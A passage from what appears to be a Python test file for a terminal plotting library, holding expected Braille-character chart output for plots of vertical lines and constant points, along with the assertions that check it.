3.49000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.40000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.31000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.22000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.13000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
3.04000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.95000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.86000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.77000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.68000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.59000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.50000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.41000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.32000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.23000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.14000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
2.05000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.96000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.87000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.78000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.69000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.60000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.51000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.42000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.33000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.24000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.15000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
1.06000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.97000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.88000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.79000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.70000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
-----------|-|---------|---------|---------|---------|---------|---------|---------|---------|-> (X)
| 0.4500000 0.4625000 0.4750000 0.4875000 0.5000000 0.5125000 0.5250000 0.5375000 0.5500000"""
print(plot([0.5, 0.5], [1, 4]))
assert expected == plot([0.5, 0.5], [1, 4])
def test_constant_x_y():
expected = """ (Y) ^
0.55000000 |
0.54750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
